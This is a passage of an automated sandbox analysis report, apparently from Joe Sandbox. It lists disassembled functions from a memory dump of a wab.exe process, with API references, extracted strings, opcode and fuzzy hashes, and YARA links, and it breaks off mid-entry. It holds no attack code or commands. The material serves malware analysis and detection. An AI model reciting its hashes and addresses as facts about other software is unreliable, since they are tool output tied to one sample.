                                                • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                Download Yara Rule
                                                APIs
                                                • wcschr.MSVCRT ref: 00413972
                                                • wcscpy.MSVCRT ref: 00413982
                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                • wcscpy.MSVCRT ref: 004139D1
                                                • wcscat.MSVCRT ref: 004139DC
                                                • memset.MSVCRT ref: 004139B8
                                                  • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                  • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                • memset.MSVCRT ref: 00413A00
                                                • memcpy.MSVCRT ref: 00413A1B
                                                • wcscat.MSVCRT ref: 00413A27
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                • String ID: \systemroot
                                                • API String ID: 4173585201-1821301763
                                                • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: wcscpy
                                                • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                • API String ID: 1284135714-318151290
                                                • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                • String ID: 0$6
                                                • API String ID: 4066108131-3849865405
                                                • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 004082EF
                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                • memset.MSVCRT ref: 00408362
                                                • memset.MSVCRT ref: 00408377
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$ByteCharMultiWide
                                                • String ID:
                                                • API String ID: 290601579-0
                                                • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00444E84 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpy$memchrmemset
                                                • String ID: PD$PD
                                                • API String ID: 1581201632-2312785699
                                                • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00409F42 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                • GetDC.USER32(00000000), ref: 00409F6E
                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                • GetParent.USER32(?), ref: 00409FA5
                                                • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                • String ID:
                                                • API String ID: 2163313125-0
                                                • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@$wcslen
                                                • String ID:
                                                • API String ID: 239872665-3916222277
                                                • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpywcslen$_snwprintfmemset
                                                • String ID: %s (%s)$YV@
                                                • API String ID: 3979103747-598926743
                                                • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                • wcslen.MSVCRT ref: 0040A6B1
                                                • wcscpy.MSVCRT ref: 0040A6C1
                                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                • wcscpy.MSVCRT ref: 0040A6DB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                • String ID: Unknown Error$netmsg.dll
                                                • API String ID: 2767993716-572158859
                                                • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                • wcscpy.MSVCRT ref: 0040DAFB
                                                • wcscpy.MSVCRT ref: 0040DB0B
                                                • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                  • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: PrivateProfilewcscpy$AttributesFileString
                                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                • API String ID: 3176057301-2039793938
                                                • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • too many attached databases - max %d, xrefs: 0042F64D
                                                • unable to open database: %s, xrefs: 0042F84E
                                                • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                • cannot ATTACH database within transaction, xrefs: 0042F663
                                                • out of memory, xrefs: 0042F865
                                                • database is already attached, xrefs: 0042F721
                                                • database %s is already in use, xrefs: 0042F6C5
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpymemset
                                                • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                • API String ID: 1297977491-2001300268
                                                • Opcode ID: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                                                • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                • Opcode Fuzzy Hash: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                                                • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                • memcpy.MSVCRT ref: 0040EB80
                                                • memcpy.MSVCRT ref: 0040EB94
                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                • String ID: ($d
                                                • API String ID: 1140211610-1915259565
                                                • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                • Sleep.KERNEL32(00000001), ref: 004178E9
                                                • GetLastError.KERNEL32 ref: 004178FB
                                                • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: File$ErrorLastLockSleepUnlock
                                                • String ID:
                                                • API String ID: 3015003838-0
                                                • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 00407E44
                                                • memset.MSVCRT ref: 00407E5B
                                                • _mbscpy.MSVCRT ref: 00407E7E
                                                • _mbscpy.MSVCRT ref: 00407ED7
                                                • _mbscpy.MSVCRT ref: 00407EEE
                                                • _mbscpy.MSVCRT ref: 00407F01
                                                • wcscpy.MSVCRT ref: 00407F10
                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                • String ID:
                                                • API String ID: 59245283-0
                                                • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041851E Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                • GetLastError.KERNEL32 ref: 0041855C
                                                • Sleep.KERNEL32(00000064), ref: 00418571
                                                • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                • GetLastError.KERNEL32 ref: 0041858E
                                                • Sleep.KERNEL32(00000064), ref: 004185A3
                                                • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: File$AttributesDeleteErrorLastSleep$??3@
                                                • String ID:
                                                • API String ID: 3467550082-0
                                                • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpy
                                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                • API String ID: 3510742995-3273207271
                                                • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                • memset.MSVCRT ref: 00413ADC
                                                • memset.MSVCRT ref: 00413AEC
                                                  • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                • memset.MSVCRT ref: 00413BD7
                                                • wcscpy.MSVCRT ref: 00413BF8
                                                • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                • String ID: 3A
                                                • API String ID: 3300951397-293699754
                                                • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                • wcscpy.MSVCRT ref: 0040D1B5
                                                  • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                  • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                • wcslen.MSVCRT ref: 0040D1D3
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                • memcpy.MSVCRT ref: 0040D24C
                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                • String ID: strings
                                                • API String ID: 3166385802-3030018805
                                                • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 00411AF6
                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                • wcsrchr.MSVCRT ref: 00411B14
                                                • wcscat.MSVCRT ref: 00411B2E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: FileModuleNamememsetwcscatwcsrchr
                                                • String ID: AE$.cfg$General$EA
                                                • API String ID: 776488737-1622828088
                                                • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 0040D8BD
                                                • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                • memset.MSVCRT ref: 0040D906
                                                • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                • _wcsicmp.MSVCRT ref: 0040D92F
                                                  • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                  • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
